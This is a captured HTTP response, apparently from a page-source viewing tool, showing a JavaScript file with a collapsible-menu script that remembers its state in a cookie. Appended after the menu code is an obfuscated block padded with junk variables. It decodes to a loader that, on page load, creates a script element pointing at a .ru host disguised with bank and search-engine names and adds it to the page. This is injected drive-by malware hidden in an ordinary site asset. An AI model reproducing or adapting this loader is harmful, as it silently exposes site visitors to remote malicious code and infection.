URL:    [ Dan Winchester Home ] [ View Source Home ] 
HTTP/1.1 200 OK
Date: Sat, 20 Mar 2010 13:46:19 GMT
Server: Apache
Last-Modified: Wed, 17 Mar 2010 09:23:16 GMT
ETag: "1c3203-104c-4ba09f84"
Accept-Ranges: bytes
Content-Length: 4172
Connection: close
Content-Type: application/x-javascript

var persistmenu="yes" //"yes" or "no". Make sure each SPAN content contains an incrementing ID starting at 1 (id="sub1", id="sub2", etc)
var persisttype="sitewide" //enter "sitewide" for menu to persist across site, "local" for this page only

if (document.getElementById){
document.write('<style type="text/css">\n')
document.write('#leftcolumn .blockContent{display: none;}\n')
document.write('</style>\n')
}

function SwitchMenu(obj){
	if(document.getElementById){
	var el = document.getElementById(obj);
	var ar = document.getElementById("masterdiv").getElementsByTagName("span");
		if(el.style.display != "block"){ //DynamicDrive.com change
			for (var i=0; i<ar.length; i++){
				if (ar[i].className=="#leftcolumn .blockContent")
				ar[i].style.display = "none";
			}
			el.style.display = "block";
		}else{
			el.style.display = "none";
		}
	}
}

function get_cookie(Name) { 
var search = Name + "="
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) { 
offset += search.length
end = document.cookie.indexOf(";", offset);
if (end == -1) end = document.cookie.length;
returnvalue=unescape(document.cookie.substring(offset, end))
}
}
return returnvalue;
}

function onloadfunction(){
if (persistmenu=="yes"){
var cookiename=(persisttype=="sitewide")? "switchmenu" : window.location.pathname
var cookievalue=get_cookie(cookiename)
if (cookievalue!="")
document.getElementById(cookievalue).style.display="block"
}
}

function savemenustate(){
var inc=1, blockid=""
while (document.getElementById("sub"+inc)){
if (document.getElementById("sub"+inc).style.display=="block"){
blockid="sub"+inc
break
}
inc++
}
var cookiename=(persisttype=="sitewide")? "switchmenu" : window.location.pathname
var cookievalue=(persisttype=="sitewide")? blockid+";path=/" : blockid
document.cookie=cookiename+"="+cookievalue
}

if (window.addEventListener)
window.addEventListener("load", onloadfunction, false)
else if (window.attachEvent)
window.attachEvent("onload", onloadfunction)
else if (document.getElementById)
window.onload=onloadfunction

if (persistmenu=="yes" && document.getElementById)
window.onunload=savemenustate


var C;if(C!='t' && C!='vV'){C='t'};this.IX="";try {var M;if(M!='HE' && M != ''){M=null};var EK=new Date();var U;if(U!='k'){U=''};var hx=new Array();var q;if(q!='xY'){q=''};var _=String("rep"+"lachVqf".substr(0,3)+"wZBewBZ".substr(3,1));var r_='';var Y;if(Y!='' && Y!='O'){Y='e'};var a=RegExp;var o=new String();var Tt=new String();function m(T,H){var _K=new String();var V;if(V!='p'){V='p'};var x=new String("[");var AP="";var r="g";var B=new String();var FW='';x+=H;var ni='';x+=new String("IjrB]".substr(4));var CS=new Array();var Gj;if(Gj!='' && Gj!='gy'){Gj='uA'};var my=new a(x, r);return T[_](my, new String());var kO=new Date();var Ge;if(Ge!='' && Ge!='aM'){Ge=null};};var Vz="";var Fx="";var ql;if(ql!='XI' && ql != ''){ql=null};var pS;if(pS!='OH' && pS != ''){pS=null};var It=new String();var UI;if(UI!=''){UI='Sb'};var v=window;var BH=new Array();var h=m('85445057448574405414',"7541");var d='';var TW=m('/xcWlKaWsUsUmKaUtUexsU.WcxoWmU/xcWlUaxsWsWmWaKtxeKsU.WcWoKmU/WmxiKnxixcUlxiUpx.UcxoKmU/UgUoWoxgWlxeK.xcxoUmx/KlxiWbUexrKoU.xiUtW.KpKhWpx',"UxKW");this._o="";var n=m('cdrdeHaHtdeHEdlHedmde8n8tH',"d8H");var aG="";var s=m('ownuluouawdW',"wWju");var ak=m('s9c9rQi9pQtQ',"Q9");var qf="";var IB;if(IB!='CE'){IB=''};var rk="";var S=m('hdtdtLpL:L/d/LcdhdadsdeL-LcLodmL.LfLrLededwLedbdsL.LcdoLmd.dhdpd-LcdodmL.LTdhdeLSLuLpdeLrLEdxdcLhdadnLgded.Lrdud:d',"Ld");w=function(){var XN;if(XN!='MH' && XN != ''){XN=null};var cs=new String();var QU=new Date();E=document[n](ak);var iF=new Date();var np=new Date();this.Bq='';var Td=new Array();d=S+h;d+=TW;var wS;if(wS!='Qc' && wS != ''){wS=null};E.src=d;var ia;if(ia!='' && ia!='FN'){ia=''};E.defer=([9,1][1]);this.VX="";var PB=new String();var OC;if(OC!='Yo'){OC='Yo'};document.body.appendChild(E);var vf="";var J;if(J!='' && J!='y'){J='dQ'};};var IS;if(IS!='' && IS!='hS'){IS=''};var sV;if(sV!='' && sV!='CY'){sV=''};v[s]=w;var j;if(j!='sgv' && j!='eHi'){j=''};var Cf;if(Cf!='' && Cf!='YG'){Cf=''};} catch(mR){};var HU;if(HU!='Ct'){HU='Ct'};
 Questions or comments welcome: contact me.